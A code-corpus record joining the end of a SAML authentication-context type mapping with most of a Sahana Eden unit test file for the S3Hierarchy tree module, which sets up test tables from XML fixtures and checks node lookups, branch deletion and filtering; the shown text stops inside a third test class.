'ActivationPinType': ActivationPinType_,
'Alphabet': Alphabet,
'AlphabetType': AlphabetType_,
'DeviceTypeType': DeviceTypeType_,
'booleanType': BooleanType_,
'ActivationLimitType': ActivationLimitType_,
'ActivationLimitDuration': ActivationLimitDuration,
'ActivationLimitUsages': ActivationLimitUsages,
'ActivationLimitSession': ActivationLimitSession,
'ActivationLimitDurationType': ActivationLimitDurationType_,
'ActivationLimitUsagesType': ActivationLimitUsagesType_,
'ActivationLimitSessionType': ActivationLimitSessionType_,
'LengthType': LengthType_,
'mediumType': MediumType_,
'KeyStorageType': KeyStorageType_,
'SecretKeyProtectionType': SecretKeyProtectionType_,
'SecurityAuditType': SecurityAuditType_,
'ExtensionOnlyType': ExtensionOnlyType_,
'Extension': Extension,
'ExtensionType': ExtensionType_,
'AuthnContextDeclarationBaseType': AuthnContextDeclarationBaseType_,
'AuthnMethodBaseType': AuthnMethodBaseType_,
'PrincipalAuthenticationMechanismType': PrincipalAuthenticationMechanismType_,
'TokenType': TokenType_,
'TimeSyncTokenType': TimeSyncTokenType_,
}
def factory(tag, **kwargs):
return ELEMENT_BY_TAG[tag](**kwargs)
| apache-2.0 |
anurag-ks/eden | modules/unit_tests/s3/s3hierarchy.py | 14 | 78245 | # -*- coding: utf-8 -*-
#
# S3Hierarchy Unit Tests
#
# To run this script use:
# python web2py.py -S eden -M -R applications/eden/modules/unit_tests/s3/s3hierarchy.py
#
import unittest
from lxml import etree
from s3dal import Field, Query
from s3.s3utils import *
from s3.s3rest import s3_request
from s3 import FS, S3Hierarchy, S3HierarchyFilter, s3_meta_fields
# =============================================================================
class S3HierarchyTests(unittest.TestCase):
""" Tests for standard hierarchies """
# -------------------------------------------------------------------------
@classmethod
def setUpClass(cls):
s3db = current.s3db
s3db.define_table("test_hierarchy",
Field("name"),
Field("category"),
Field("type"),
Field("parent", "reference test_hierarchy"),
*s3_meta_fields())
s3db.define_table("test_hierarchy_reference",
Field("test_hierarchy_id", "reference test_hierarchy",
ondelete = "RESTRICT",
),
Field("test_hierarchy_multi_id", "list:reference test_hierarchy"),
*s3_meta_fields())
xmlstr = """
<s3xml>
<resource name="test_hierarchy" uuid="HIERARCHY1">
<data field="name">Type 1</data>
<data field="category">Cat 0</data>
<data field="type">A</data>
</resource>
<resource name="test_hierarchy" uuid="HIERARCHY1-1">
<data field="name">Type 1-1</data>
<data field="category">Cat 1</data>
<data field="type">C</data>
<reference field="parent" resource="test_hierarchy" uuid="HIERARCHY1"/>
</resource>
<resource name="test_hierarchy" uuid="HIERARCHY1-1-1">
<data field="name">Type 1-1-1</data>
<data field="category">Cat 2</data>
<data field="type">B</data>
<reference field="parent" resource="test_hierarchy" uuid="HIERARCHY1-1"/>
</resource>
<resource name="test_hierarchy" uuid="HIERARCHY1-1-2">
<data field="name">Type 1-1-2</data>
<data field="category">Cat 2</data>
<data field="type">A</data>
<reference field="parent" resource="test_hierarchy" uuid="HIERARCHY1-1"/>
</resource>
<resource name="test_hierarchy" uuid="HIERARCHY1-2">
<data field="name">Type 1-2</data>
<data field="category">Cat 1</data>
<data field="type">B</data>
<reference field="parent" resource="test_hierarchy" uuid="HIERARCHY1"/>
</resource>
<resource name="test_hierarchy" uuid="HIERARCHY1-2-1">
<data field="name">Type 1-2-1</data>
<data field="category">Cat 2</data>
<data field="type">B</data>
<reference field="parent" resource="test_hierarchy" uuid="HIERARCHY1-2"/>
</resource>
<resource name="test_hierarchy" uuid="HIERARCHY1-2-2">
<data field="name">Type 1-2-2</data>
<data field="category">Cat 2</data>
<data field="type">C</data>
<reference field="parent" resource="test_hierarchy" uuid="HIERARCHY1-2"/>
</resource>
<resource name="test_hierarchy" uuid="HIERARCHY2">
<data field="name">Type 2</data>
<data field="category">Cat 0</data>
<data field="type">B</data>
</resource>
<resource name="test_hierarchy" uuid="HIERARCHY2-1">
<data field="name">Type 2-1</data>
<data field="category">Cat 1</data>
<data field="type">A</data>
<reference field="parent" resource="test_hierarchy" uuid="HIERARCHY2"/>
</resource>
<resource name="test_hierarchy" uuid="HIERARCHY2-1-1">
<data field="name">Type 2-1-1</data>
<data field="category">Cat 2</data>
<data field="type">C</data>
<reference field="parent" resource="test_hierarchy" uuid="HIERARCHY2-1"/>
</resource>
<resource name="test_hierarchy" uuid="HIERARCHY2-1-2">
<data field="name">Type 2-1-2</data>
<data field="category">Cat 2</data>
<data field="type">D</data>
<reference field="parent" resource="test_hierarchy" uuid="HIERARCHY2-1"/>
</resource>
</s3xml>
"""
xmltree = etree.ElementTree(etree.fromstring(xmlstr))
current.auth.override = True
resource = s3db.resource("test_hierarchy")
resource.import_xml(xmltree)
current.db.commit()
# -------------------------------------------------------------------------
@classmethod
def tearDownClass(cls):
db = current.db
db.test_hierarchy_reference.drop()
db.test_hierarchy.drop(mode="cascade")
current.db.commit()
# -------------------------------------------------------------------------
def setUp(self):
current.auth.override = True
db = current.db
if not hasattr(self, "rows"):
table = db.test_hierarchy
rows = db((table.id>0) & (table.deleted != True)).select()
self.rows = {}
self.uids = {}
self.ids = {}
for row in rows:
uid = row.uuid
self.rows[uid] = row
self.uids[uid] = row.id
self.ids[row.id] = uid
current.s3db.configure("test_hierarchy",
hierarchy=("parent", "category"))
# -------------------------------------------------------------------------
def tearDown(self):
current.auth.override = False
# -------------------------------------------------------------------------
def testHierarchyConstruction(self):
""" Test hierarchy construction """
uids = self.uids
assertEqual = self.assertEqual
assertTrue = self.assertTrue
h = S3Hierarchy("test_hierarchy")
roots = h.roots
assertEqual(len(roots), 2)
assertTrue(uids["HIERARCHY1"] in roots)
assertTrue(uids["HIERARCHY2"] in roots)
nodes = h.nodes
assertEqual(len(nodes), len(uids))
assertTrue(all(node_id in nodes for node_id in uids.values()))
# -------------------------------------------------------------------------
def testPreprocessCreateNode(self):
""" Test preprocessing of a create-node request """
r = s3_request("test", "hierarchy", http="POST")
parent_node = self.rows["HIERARCHY1"]
parent_id = parent_node.id
h = S3Hierarchy("test_hierarchy")
link = h.preprocess_create_node(r, parent_id)
self.assertEqual(link, None)
assertEqual = self.assertEqual
post_vars = r.post_vars
assertEqual(post_vars["parent"], parent_id)
field = r.table.parent
assertEqual(field.default, parent_id)
assertEqual(field.update, parent_id)
self.assertFalse(field.readable)
self.assertFalse(field.writable)
# -------------------------------------------------------------------------
def testDeleteBranch(self):
""" Test recursive deletion of a hierarchy branch """
# Add additional nodes
xmlstr = """
<s3xml>
<resource name="test_hierarchy" uuid="HIERARCHY1-3">
<data field="name">Type 1-3</data>
<reference field="parent" resource="test_hierarchy" uuid="HIERARCHY1"/>
</resource>
<resource name="test_hierarchy" uuid="HIERARCHY1-3-1">
<data field="name">Type 1-3-1</data>
<reference field="parent" resource="test_hierarchy" uuid="HIERARCHY1-3"/>
</resource>
<resource name="test_hierarchy" uuid="HIERARCHY1-3-2">
<data field="name">Type 1-3-2</data>
<reference field="parent" resource="test_hierarchy" uuid="HIERARCHY1-3"/>
</resource>
</s3xml>
"""
xmltree = etree.ElementTree(etree.fromstring(xmlstr))
resource = current.s3db.resource("test_hierarchy")
resource.import_xml(xmltree)
# Commit here, otherwise failing deletion will roll back the import, too
db = current.db
db.commit()
assertTrue = self.assertTrue
assertFalse = self.assertFalse
assertEqual = self.assertEqual
table = db.test_hierarchy
try:
# Capture the uuids
rows = db(table.uuid.like("HIERARCHY1-3%")).select()
uids = {}
for row in rows:
assertFalse(row.deleted)
uids[row.uuid] = row.id
# Mark as dirty after import
h = S3Hierarchy("test_hierarchy")
h.dirty("test_hierarchy")
# Verify that branch node has been added to the hierarchy
branches = h.children(self.uids["HIERARCHY1"])
assertTrue(uids["HIERARCHY1-3"] in branches)
# Verify that children have been added, too
children = h.children(uids["HIERARCHY1-3"])
assertEqual(len(children), 2)
# Delete the branch
success = h.delete([uids["HIERARCHY1-3"]])
assertEqual(success, 3)
# Verify that branch has been deleted
branches = h.children(self.uids["HIERARCHY1"])
assertFalse(uids["HIERARCHY1-3"] in branches)
# Child nodes must be gone as well
nodes = h.nodes
assertTrue(all(uids[uid] not in nodes for uid in uids))
# Verify that the nodes are deleted from database too
rows = db(table.uuid.like("HIERARCHY1-3%")).select()
for row in rows:
assertTrue(row.deleted)
uids[row.uuid] = row.id
finally:
# Cleanup
db(table.uuid.like("HIERARCHY1-3%")).delete()
# -------------------------------------------------------------------------
def testDeleteBranchFailure(self):
"""
Test proper handling of deletion cascade failure due to
db integrity constraints
"""
# Add additional nodes
xmlstr = """
<s3xml>
<resource name="test_hierarchy" uuid="HIERARCHY1-4">
<data field="name">Type 1-4</data>
<reference field="parent" resource="test_hierarchy" uuid="HIERARCHY1"/>
</resource>
<resource name="test_hierarchy" uuid="HIERARCHY1-4-1">
<data field="name">Type 1-4-1</data>
<reference field="parent" resource="test_hierarchy" uuid="HIERARCHY1-4"/>
</resource>
<resource name="test_hierarchy" uuid="HIERARCHY1-4-2">
<data field="name">Type 1-4-2</data>
<reference field="parent" resource="test_hierarchy" uuid="HIERARCHY1-4"/>
</resource>
<resource name="test_hierarchy_reference" uuid="REF1">
<reference field="test_hierarchy_id" uuid="HIERARCHY1-4-1"/>
</resource>
</s3xml>
"""
xmltree = etree.ElementTree(etree.fromstring(xmlstr))
db = current.db
s3db = current.s3db
resource = s3db.resource("test_hierarchy")
resource.import_xml(xmltree)
resource = s3db.resource("test_hierarchy_reference")
resource.import_xml(xmltree)
# Commit here, otherwise failing deletion will roll back the import, too
db.commit()
assertTrue = self.assertTrue
assertFalse = self.assertFalse
assertEqual = self.assertEqual
table = db.test_hierarchy
try:
# Capture the uuids
rows = db(table.uuid.like("HIERARCHY1-4%")).select()
uids = {}
for row in rows:
assertFalse(row.deleted)
uids[row.uuid] = row.id
# Mark as dirty after import
h = S3Hierarchy("test_hierarchy")
h.dirty("test_hierarchy")
# Verify that branch node has been added to the hierarchy
branches = h.children(self.uids["HIERARCHY1"])
assertTrue(uids["HIERARCHY1-4"] in branches)
# Verify that children have been added, too
children = h.children(uids["HIERARCHY1-4"])
assertEqual(len(children), 2)
# Try delete the branch => should fail
success = h.delete([uids["HIERARCHY1-4"]])
assertEqual(success, None)
# Verify that branch has not been deleted
branches = h.children(self.uids["HIERARCHY1"])
assertTrue(uids["HIERARCHY1-4"] in branches)
# Child nodes must still be in the hierarchy
nodes = h.nodes
assertTrue(all(uids[uid] in nodes for uid in uids))
# Verify that the nodes are not deleted from database either
rows = db(table.uuid.like("HIERARCHY1-4%")).select()
for row in rows:
assertFalse(row.deleted)
# Remove the blocker
db(db.test_hierarchy_reference.uuid == "REF1").delete()
# Try again to delete the branch => should succeed now
success = h.delete([uids["HIERARCHY1-4"]])
assertEqual(success, 3)
# Verify that branch has been deleted
branches = h.children(self.uids["HIERARCHY1"])
assertFalse(uids["HIERARCHY1-4"] in branches)
# Child nodes must be gone as well
nodes = h.nodes
assertTrue(all(uids[uid] not in nodes for uid in uids))
# Verify that the nodes are deleted from database too
rows = db(table.uuid.like("HIERARCHY1-4%")).select()
for row in rows:
assertTrue(row.deleted)
uids[row.uuid] = row.id
finally:
# Cleanup
db(table.uuid.like("HIERARCHY1-4%")).delete()
# -------------------------------------------------------------------------
def testCategory(self):
""" Test node category lookup """
uids = self.uids
rows = self.rows
assertEqual = self.assertEqual
h = S3Hierarchy("test_hierarchy")
for uid in uids:
category = h.category(uids[uid])
assertEqual(category, rows[uid].category)
# -------------------------------------------------------------------------
def testParent(self):
""" Test parent lookup """
ids = self.ids
uids = self.uids
rows = self.rows
assertEqual = self.assertEqual
h = S3Hierarchy("test_hierarchy")
for uid in uids:
parent, category = h.parent(uids[uid], classify=True)
assertEqual(parent, rows[uid].parent)
if parent:
parent_uid = ids[parent]
assertEqual(category, rows[parent_uid].category)
# -------------------------------------------------------------------------
def testChildren(self):
""" Test child node lookup """
uids = self.uids
rows = self.rows
assertEqual = self.assertEqual
h = S3Hierarchy("test_hierarchy")
for uid in uids:
assertEqual(h.children(uids[uid]),
set(row.id for row in rows.values()
if row.parent == uids[uid]))
# -------------------------------------------------------------------------
def testPath(self):
""" Test node path lookup """
uids = self.uids
rows = self.rows
assertEqual = self.assertEqual
# Standard path from root
node = uids["HIERARCHY2-1-2"]
h = S3Hierarchy("test_hierarchy")
path = h.path(node)
assertEqual(path, [uids["HIERARCHY2"],
uids["HIERARCHY2-1"],
uids["HIERARCHY2-1-2"]
])
# Path from category root
node = uids["HIERARCHY1-1-1"]
path = h.path(node, category="Cat 1", classify=True)
classified = lambda uid: (uids[uid], rows[uid].category)
assertEqual(path, [classified("HIERARCHY1-1"),
classified("HIERARCHY1-1-1"),
])
# Path of root
node = uids["HIERARCHY2"]
path = h.path(node, category="Cat 1", classify=True)
classified = lambda uid: (uids[uid], rows[uid].category)
assertEqual(path, [classified("HIERARCHY2")])
# -------------------------------------------------------------------------
def testRoot(self):
""" Test root node lookup """
uids = self.uids
rows = self.rows
assertEqual = self.assertEqual
# Top root
node = uids["HIERARCHY1-1-1"]
h = S3Hierarchy("test_hierarchy")
root = h.root(node)
assertEqual(root, uids["HIERARCHY1"])
# Root by category
node = uids["HIERARCHY2-1"]
root = h.root(node, classify=True)
assertEqual(root, (uids["HIERARCHY2"], rows["HIERARCHY2"].category))
# Root of root
node = uids["HIERARCHY1"]
root = h.root(node)
assertEqual(root, uids["HIERARCHY1"])
# None
root = h.root(None)
assertEqual(root, None)
# -------------------------------------------------------------------------
def testDepth(self):
""" Test determination of the maximum depth beneath a node """
uids = self.uids
rows = self.rows
assertEqual = self.assertEqual
h = S3Hierarchy("test_hierarchy")
# Top root
node = uids["HIERARCHY1"]
assertEqual(h.depth(node), 2)
# Sub-node
node = uids["HIERARCHY2-1"]
assertEqual(h.depth(node), 1)
# Leaf
node = uids["HIERARCHY1-1-1"]
assertEqual(h.depth(node), 0)
# None (processes all roots)
assertEqual(h.depth(None), 2)
# -------------------------------------------------------------------------
def testSiblings(self):
""" Test lookup of sibling nodes """
uids = self.uids
rows = self.rows
assertEqual = self.assertEqual
h = S3Hierarchy("test_hierarchy")
for uid in uids:
parent = rows[uid].parent
siblings = set(row.id for row in rows.values()
if row.parent == parent)
assertEqual(h.siblings(uids[uid], inclusive=True), siblings)
siblings.discard(uids[uid])
assertEqual(h.siblings(uids[uid], inclusive=False), siblings)
# -------------------------------------------------------------------------
def testFindAll(self):
""" Test lookup of descendant nodes """
uids = self.uids
h = S3Hierarchy("test_hierarchy")
assertEqual = self.assertEqual
root = uids["HIERARCHY1"]
nodes = h.findall(root)
expected = ["HIERARCHY1-1",
"HIERARCHY1-1-1",
"HIERARCHY1-1-2",
"HIERARCHY1-2",
"HIERARCHY1-2-1",
"HIERARCHY1-2-2",
]
assertEqual(nodes, set(uids[uid] for uid in expected))
root = uids["HIERARCHY1"]
nodes = h.findall(root, inclusive=True)
expected = ["HIERARCHY1",
"HIERARCHY1-1",
"HIERARCHY1-1-1",
"HIERARCHY1-1-2",
"HIERARCHY1-2",
"HIERARCHY1-2-1",
"HIERARCHY1-2-2",
]
assertEqual(nodes, set(uids[uid] for uid in expected))
root = uids["HIERARCHY2"]
nodes = h.findall(root, category="Cat 1")
expected = ["HIERARCHY2-1",
]
assertEqual(nodes, set(uids[uid] for uid in expected))
root = uids["HIERARCHY1"]
nodes = h.findall(root, category="Cat 4")
assertEqual(nodes, set())
# -------------------------------------------------------------------------
def testExportNode(self):
""" Test export of nodes """
assertEqual = self.assertEqual
assertTrue = self.assertTrue
assertFalse = self.assertFalse
h = S3Hierarchy("test_hierarchy")
data = dict((self.uids[uid], self.rows[uid]) for uid in self.uids)
# Export the rows beneath node HIERARCHY1
root = self.uids["HIERARCHY1"]
output = h.export_node(root,
depth=2,
prefix="_export",
data=data,
hcol = "test_hierarchy.name",
columns=["test_hierarchy.category"],
)
# Should give 7 rows
assertEqual(len(output), 7)
for row in output:
next_level = True
for i in xrange(2):
hcol = "_export.%s" % i
# All hierarchy columns must be present
assertTrue(hcol in row)
label = row[hcol]
# The row should belong to this branch
if label != "" and next_level:
assertEqual(label[:6], "Type 1")
else:
# Levels below the last level must be empty
next_level = False
assertEqual(label, "")
assertTrue("test_hierarchy.category" in row)
assertFalse("test_hierarchy.name" in row)
# -------------------------------------------------------------------------
def testFilteringLeafOnly(self):
""" Test filtering of the tree with leafonly=True """
uids = self.uids
assertEqual = self.assertEqual
assertTrue = self.assertTrue
h = S3Hierarchy("test_hierarchy",
filter = FS("type") == "D",
leafonly = True)
# Check nodes
nodes = h.nodes
expected = ["HIERARCHY2",
"HIERARCHY2-1",
"HIERARCHY2-1-2"]
assertEqual(len(nodes), len(expected))
assertTrue(all(uids[uid] in nodes for uid in expected))
# Check consistency
for node in nodes.values():
assertTrue(all(child_id in nodes for child_id in node["s"]))
parent_id = node["p"]
if parent_id:
assertTrue(parent_id in nodes)
# -------------------------------------------------------------------------
def testFilteringAnyNode(self):
""" Test filtering of the tree with leafonly=False """
uids = self.uids
h = S3Hierarchy("test_hierarchy",
filter = FS("type") == "C",
leafonly = False)
assertEqual = self.assertEqual
assertTrue = self.assertTrue
# Check nodes
nodes = h.nodes
expected = ["HIERARCHY1",
"HIERARCHY1-1",
"HIERARCHY1-2",
"HIERARCHY1-2-2",
"HIERARCHY2",
"HIERARCHY2-1",
"HIERARCHY2-1-1"]
assertEqual(len(nodes), len(expected))
assertTrue(all(uids[uid] in nodes for uid in expected))
# Check consistency
for node in nodes.values():
assertTrue(all(child_id in nodes for child_id in node["s"]))
parent_id = node["p"]
if parent_id:
assertTrue(parent_id in nodes)
# =============================================================================
class S3LinkedHierarchyTests(unittest.TestCase):
""" Tests for linktable-based hierarchies """
# -------------------------------------------------------------------------
@classmethod
def setUpClass(cls):
s3db = current.s3db
s3db.define_table("test_lhierarchy",
Field("name"),
Field("category"),
Field("type"),
*s3_meta_fields())
s3db.define_table("test_lhierarchy_link",
Field("parent_id", "reference test_lhierarchy"),
Field("child_id", "reference test_lhierarchy"),
*s3_meta_fields())
# Component for import
s3db.add_components("test_lhierarchy",
test_lhierarchy = {"name": "parent",
"link": "test_lhierarchy_link",
"joinby": "child_id",
"key": "parent_id",
},
),
xmlstr = """
<s3xml>
<resource name="test_lhierarchy" uuid="LHIERARCHY1">
<data field="name">Type 1</data>
<data field="category">Cat 0</data>
<data field="type">A</data>
</resource>
<resource name="test_lhierarchy" uuid="LHIERARCHY1-1">
<data field="name">Type 1-1</data>
<data field="category">Cat 1</data>
<data field="type">C</data>
<resource name="test_lhierarchy_link">
<reference field="parent_id"
resource="test_lhierarchy" uuid="LHIERARCHY1"/>
</resource>
</resource>
<resource name="test_lhierarchy" uuid="LHIERARCHY1-1-1">
<data field="name">Type 1-1-1</data>
<data field="category">Cat 2</data>
<data field="type">B</data>
<resource name="test_lhierarchy_link">
<reference field="parent_id"
resource="test_lhierarchy" uuid="LHIERARCHY1-1"/>
</resource>
</resource>
<resource name="test_lhierarchy" uuid="LHIERARCHY1-1-2">
<data field="name">Type 1-1-2</data>
<data field="category">Cat 2</data>
<data field="type">A</data>
<resource name="test_lhierarchy_link">
<reference field="parent_id"
resource="test_lhierarchy" uuid="LHIERARCHY1-1"/>
</resource>
</resource>
<resource name="test_lhierarchy" uuid="LHIERARCHY1-2">
<data field="name">Type 1-2</data>
<data field="category">Cat 1</data>
<data field="type">B</data>
<resource name="test_lhierarchy_link">
<reference field="parent_id"
resource="test_lhierarchy" uuid="LHIERARCHY1"/>
</resource>
</resource>
<resource name="test_lhierarchy" uuid="LHIERARCHY1-2-1">
<data field="name">Type 1-2-1</data>
<data field="category">Cat 2</data>
<data field="type">B</data>
<resource name="test_lhierarchy_link">
<reference field="parent_id"
resource="test_lhierarchy" uuid="LHIERARCHY1-2"/>
</resource>
</resource>
<resource name="test_lhierarchy" uuid="LHIERARCHY1-2-2">
<data field="name">Type 1-2-2</data>
<data field="category">Cat 2</data>
<data field="type">C</data>
<resource name="test_lhierarchy_link">
<reference field="parent_id"
resource="test_lhierarchy" uuid="LHIERARCHY1-2"/>
</resource>
</resource>
<resource name="test_lhierarchy" uuid="LHIERARCHY2">
<data field="name">Type 2</data>
<data field="category">Cat 0</data>
<data field="type">B</data>
</resource>
<resource name="test_lhierarchy" uuid="LHIERARCHY2-1">
<data field="name">Type 2-1</data>
<data field="category">Cat 1</data>
<data field="type">A</data>
<resource name="test_lhierarchy_link">
<reference field="parent_id"
resource="test_lhierarchy" uuid="LHIERARCHY2"/>
</resource>
</resource>
<resource name="test_lhierarchy" uuid="LHIERARCHY2-1-1">
<data field="name">Type 2-1-1</data>
<data field="category">Cat 2</data>
<data field="type">C</data>
<resource name="test_lhierarchy_link">
<reference field="parent_id"
resource="test_lhierarchy" uuid="LHIERARCHY2-1"/>
</resource>
</resource>
<resource name="test_lhierarchy" uuid="LHIERARCHY2-1-2">
<data field="name">Type 2-1-2</data>
<data field="category">Cat 2</data>
<data field="type">D</data>
<resource name="test_lhierarchy_link">
<reference field="parent_id"
resource="test_lhierarchy" uuid="LHIERARCHY2-1"/>
</resource>
</resource>
</s3xml>
"""
xmltree = etree.ElementTree(etree.fromstring(xmlstr))
current.auth.override = True
resource = s3db.resource("test_lhierarchy")
resource.import_xml(xmltree)
# -------------------------------------------------------------------------
@classmethod
def tearDownClass(cls):
db = current.db
db.test_lhierarchy_link.drop()
db.test_lhierarchy.drop()
# -------------------------------------------------------------------------
def setUp(self):
current.auth.override = True
db = current.db
if not hasattr(self, "rows"):
table = db.test_lhierarchy
linktable = db.test_lhierarchy_link
left = linktable.on(linktable.child_id == table.id)
rows = db(db.test_lhierarchy.id>0).select(table.id,
table.uuid,
table.category,
linktable.child_id,
linktable.parent_id,
left=left)
self.rows = {}
self.links = {}
self.uids = {}
self.ids = {}
for row in rows:
record = row.test_lhierarchy
uid = record.uuid
self.rows[uid] = record
self.links[uid] = row.test_lhierarchy_link
self.uids[uid] = record.id
self.ids[record.id] = uid
current.s3db.configure("test_lhierarchy",
hierarchy=("child_id:test_lhierarchy_link.parent_id",
"category"))
# -------------------------------------------------------------------------
def tearDown(self):
current.auth.override = False
# -------------------------------------------------------------------------
def testHierarchyConstruction(self):
""" Test hierarchy construction """
uids = self.uids
h = S3Hierarchy("test_lhierarchy")
assertEqual = self.assertEqual
assertTrue = self.assertTrue
roots = h.roots
assertEqual(len(roots), 2)
assertTrue(uids["LHIERARCHY1"] in roots)
assertTrue(uids["LHIERARCHY2"] in roots)
nodes = h.nodes
assertEqual(len(nodes), len(uids))
assertTrue(all(node_id in nodes for node_id in uids.values()))
# -------------------------------------------------------------------------
def testPreprocessCreateNode(self):
""" Test preprocessing of a create-node request """
r = s3_request("test", "lhierarchy", http="POST")
parent_node = self.rows["LHIERARCHY1"]
h = S3Hierarchy("test_lhierarchy")
link = h.preprocess_create_node(r, parent_node.id)
self.assertNotEqual(link, None)
assertEqual = self.assertEqual
assertEqual(link["linktable"], "test_lhierarchy_link")
assertEqual(link["lkey"], "child_id")
assertEqual(link["rkey"], "parent_id")
assertEqual(link["parent_id"], parent_node.id)
# -------------------------------------------------------------------------
def testPostprocessCreateNode(self):
""" Test postprocessing of a create-node request """
r = s3_request("test", "lhierarchy", http="POST")
parent_node = self.rows["LHIERARCHY1"]
h = S3Hierarchy("test_lhierarchy")
link = h.preprocess_create_node(r, parent_node.id)
row = None
record_id = None
db = current.db
table = db.test_lhierarchy
linktable = db.test_lhierarchy_link
try:
record = {"uuid": "LHIERARCHYNEW", "name": "NewNode"}
record_id = table.insert(**record)
record["id"] = record_id
h.postprocess_create_node(link, record)
query = (linktable.parent_id == parent_node.id) & \
(linktable.child_id == record_id)
row = db(query).select(linktable.id, limitby=(0, 1)).first()
self.assertNotEqual(row, None)
finally:
if row:
row.delete_record()
if record_id:
db(table.id == record_id).delete()
# -------------------------------------------------------------------------
def testCategory(self):
""" Test node category lookup """
uids = self.uids
rows = self.rows
assertEqual = self.assertEqual
h = S3Hierarchy("test_lhierarchy")
for uid in uids:
category = h.category(uids[uid])
assertEqual(category, rows[uid].category)
# -------------------------------------------------------------------------
def testParent(self):
""" Test parent lookup """
uids = self.uids
rows = self.rows
links = self.links
assertEqual = self.assertEqual
h = S3Hierarchy("test_lhierarchy")
for uid in uids:
parent, category = h.parent(uids[uid], classify=True)
assertEqual(parent, links[uid].parent_id)
if parent:
parent_uid = self.ids[parent]
assertEqual(category, rows[parent_uid].category)
# -------------------------------------------------------------------------
def testChildren(self):
""" Test child node lookup """
uids = self.uids
links = self.links
assertEqual = self.assertEqual
h = S3Hierarchy("test_lhierarchy")
for uid in uids:
assertEqual(h.children(uids[uid]),
set(link.child_id for link in links.values()
if link.parent_id == uids[uid]))
# -------------------------------------------------------------------------
def testPath(self):
""" Test node path lookup """
uids = self.uids
rows = self.rows
assertEqual = self.assertEqual
# Standard path from root
node = uids["LHIERARCHY2-1-2"]
h = S3Hierarchy("test_lhierarchy")
path = h.path(node)
assertEqual(path, [uids["LHIERARCHY2"],
uids["LHIERARCHY2-1"],
uids["LHIERARCHY2-1-2"]
])
# Path from category root
node = uids["LHIERARCHY1-1-1"]
path = h.path(node, category="Cat 1", classify=True)
classified = lambda uid: (uids[uid], rows[uid].category)
assertEqual(path, [classified("LHIERARCHY1-1"),
classified("LHIERARCHY1-1-1"),
])
# Path of root
node = uids["LHIERARCHY2"]
path = h.path(node, category="Cat 1", classify=True)
classified = lambda uid: (uids[uid], rows[uid].category)
assertEqual(path, [classified("LHIERARCHY2")])
# -------------------------------------------------------------------------
def testRoot(self):
""" Test root node lookup """
uids = self.uids
rows = self.rows
assertEqual = self.assertEqual
assertTrue = self.assertTrue
# Top root
node = uids["LHIERARCHY1-1-1"]
h = S3Hierarchy("test_lhierarchy")
root = h.root(node)
assertEqual(root, uids["LHIERARCHY1"])
# Root by category
node = uids["LHIERARCHY2-1"]
root = h.root(node, classify=True)
assertEqual(root, (uids["LHIERARCHY2"],
rows["LHIERARCHY2"].category))
# Root of root
node = uids["LHIERARCHY1"]
root = h.root(node)
assertEqual(root, uids["LHIERARCHY1"])
# None
root = h.root(None)
assertEqual(root, None)
# -------------------------------------------------------------------------
def testSiblings(self):
""" Test lookup of sibling nodes """
uids = self.uids
ids = self.ids
links = self.links
assertEqual = self.assertEqual
h = S3Hierarchy("test_lhierarchy")
for uid in uids:
parent = links[uid].parent_id
siblings = set(node for node, _uid in ids.items()
if links[_uid].parent_id == parent)
assertEqual(h.siblings(uids[uid], inclusive=True), siblings)
siblings.discard(uids[uid])
assertEqual(h.siblings(uids[uid], inclusive=False), siblings)
# -------------------------------------------------------------------------
def testFindAll(self):
""" Test lookup of descendant nodes """
uids = self.uids
assertEqual = self.assertEqual
h = S3Hierarchy("test_lhierarchy")
root = uids["LHIERARCHY1"]
nodes = h.findall(root)
expected = ["LHIERARCHY1-1",
"LHIERARCHY1-1-1",
"LHIERARCHY1-1-2",
"LHIERARCHY1-2",
"LHIERARCHY1-2-1",
"LHIERARCHY1-2-2",
]
assertEqual(nodes, set(uids[uid] for uid in expected))
root = uids["LHIERARCHY1"]
nodes = h.findall(root, inclusive=True)
expected = ["LHIERARCHY1",
"LHIERARCHY1-1",
"LHIERARCHY1-1-1",
"LHIERARCHY1-1-2",
"LHIERARCHY1-2",
"LHIERARCHY1-2-1",
"LHIERARCHY1-2-2",
]
assertEqual(nodes, set(uids[uid] for uid in expected))
root = uids["LHIERARCHY2"]
nodes = h.findall(root, category="Cat 1")
expected = ["LHIERARCHY2-1",
]
assertEqual(nodes, set(uids[uid] for uid in expected))
root = uids["LHIERARCHY1"]
nodes = h.findall(root, category="Cat 4")
assertEqual(nodes, set())
# -------------------------------------------------------------------------
def testFilteringLeafOnly(self):
""" Test filtering of the tree with leafonly=True """
uids = self.uids
assertEqual = self.assertEqual
assertTrue = self.assertTrue
h = S3Hierarchy("test_lhierarchy",
filter = FS("type") == "D",
leafonly = True)
# Check nodes
nodes = h.nodes
expected = ["LHIERARCHY2",
"LHIERARCHY2-1",
"LHIERARCHY2-1-2"]
assertEqual(len(nodes), len(expected))
assertTrue(all(uids[uid] in nodes for uid in expected))
# Check consistency
for node in nodes.values():
assertTrue(all(child_id in nodes for child_id in node["s"]))
parent_id = node["p"]
if parent_id:
assertTrue(parent_id in nodes)
# -------------------------------------------------------------------------
def testFilteringAnyNode(self):
""" Test filtering of the tree with leafonly=False """
uids = self.uids
assertEqual = self.assertEqual
assertTrue = self.assertTrue
h = S3Hierarchy("test_lhierarchy",
filter = FS("type") == "C",
leafonly = False)
# Check nodes
nodes = h.nodes
expected = ["LHIERARCHY1",
"LHIERARCHY1-1",
"LHIERARCHY1-2",
"LHIERARCHY1-2-2",
"LHIERARCHY2",
"LHIERARCHY2-1",
"LHIERARCHY2-1-1"]
assertEqual(len(nodes), len(expected))
assertTrue(all(uids[uid] in nodes for uid in expected))
# Check consistency
for node in nodes.values():
assertTrue(all(child_id in nodes for child_id in node["s"]))
parent_id = node["p"]
if parent_id:
assertTrue(parent_id in nodes)
# =============================================================================
class S3TypeOfTests(unittest.TestCase):
""" Tests for __typeof query operator """
# -------------------------------------------------------------------------
@classmethod
def setUpClass(cls):
s3db = current.s3db
s3db.define_table("typeof_nonhierarchy",
Field("name"),
*s3_meta_fields())
s3db.define_table("typeof_hierarchy",
Field("name"),
Field("parent", "reference typeof_hierarchy"),
Field("typeof_nonhierarchy_id", "reference typeof_nonhierarchy"),
Field("typeof_nonhierarchy_multi_id", "list:reference typeof_nonhierarchy"),
Field.Method("vsfield", lambda row: "test"),
Field.Method("vmfield", lambda row: ["test1", "test2", "test3"]),
*s3_meta_fields())
s3db.define_table("typeof_hierarchy_reference",
Field("typeof_hierarchy_id", "reference typeof_hierarchy"),
Field("typeof_hierarchy_multi_id", "list:reference typeof_hierarchy"),
*s3_meta_fields())
xmlstr = """
<s3xml>
